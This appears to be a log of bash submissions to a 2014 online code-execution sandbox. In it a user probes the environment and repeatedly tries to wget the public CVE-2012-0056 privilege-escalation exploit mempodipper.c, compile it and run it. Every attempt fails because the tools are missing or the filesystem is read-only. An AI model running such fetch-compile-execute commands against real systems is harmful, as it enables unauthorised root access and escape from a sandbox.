andgein


Sat Jan 18 23:06:00 2014
bash

./code: line 1: g++: command not found

g++
Sat Jan 18 23:05:53 2014
bash

gcc: fatal error: no input files compilation terminated.

gcc
Sat Jan 18 23:05:44 2014
perl


              
instead of
test2
gcc
Sat Jan 18 23:01:20 2014
bash

./code: line 1: ifconfig: command not found

ifconfig -a
Sat Jan 18 23:01:10 2014
bash

./code: line 1: ifconfig: command not found

ifconfig
Sat Jan 18 23:00:46 2014
bash

./code: line 2: a: command not found

alias a=curl
a ya.ru
Sat Jan 18 23:00:35 2014
bash

./code: line 2: a: command not found

alias a=wget
a ya.ru
Sat Jan 18 23:00:21 2014
bash

./code: line 1: wget: command not found

wget python.org
Sat Jan 18 23:00:11 2014
bash

./code: line 1: wget: command not found

wget 'http://ya.ru'
Sat Jan 18 22:59:54 2014
bash

./code: line 1: wget: command not found

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c -O /tmp/1.c
Sat Jan 18 22:59:47 2014
bash

./code: line 1: wget: command not found ./code: line 2: /tmp/1: No such file or directory

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c -O /tmp/1.c
/tmp/1
Sat Jan 18 22:59:36 2014
bash

./code: line 1: wget: command not found gcc: error: /tmp/1.c: No such file or directory gcc: error: /tmp/1: No such file or directory gcc: fatal error: no input files compilation terminated. ./code: line 3: /tmp/1: No such file or directory

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c -O /tmp/1.c
gcc /tmp/1.c -O /tmp/1
/tmp/1
Sat Jan 18 22:53:55 2014
bash

./code: line 1: wget: command not found ./code: line 2: /tmp/main.py: Read-only file system python3: can't open file '/tmp/main.py': [Errno 2] No such file or directory

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c -O /tmp/1.c
echo 'print(1)' > /tmp/main.py
python3 /tmp/main.py
Sat Jan 18 22:53:19 2014
bash

./code: line 1: /tmp/main.py: Read-only file system python3: can't open file '/tmp/main.py': [Errno 2] No such file or directory

echo 'print(1)' > /tmp/main.py
python3 /tmp/main.py
Sat Jan 18 22:53:09 2014
bash

./code: line 1: /tmp/main.py: Read-only file system

echo 'print(1)' > /tmp/main.py
Sat Jan 18 22:52:54 2014
bash

print(1)
instead of
test2
echo 'print(1)'
Sat Jan 18 22:51:58 2014
bash

./code: line 1: main.py: Permission denied

echo 'print(1)' > main.py
Sat Jan 18 22:51:51 2014
bash

./code: line 1: syntax error near unexpected token `(' ./code: line 1: `echo print(1) > main.py'

echo print(1) > main.py
Sat Jan 18 22:51:40 2014
bash

cat: print(1): No such file or directory

cat "print(1)"
Sat Jan 18 22:51:34 2014
bash

./code: line 1: main.py: Permission denied

cat "print(1)" > main.py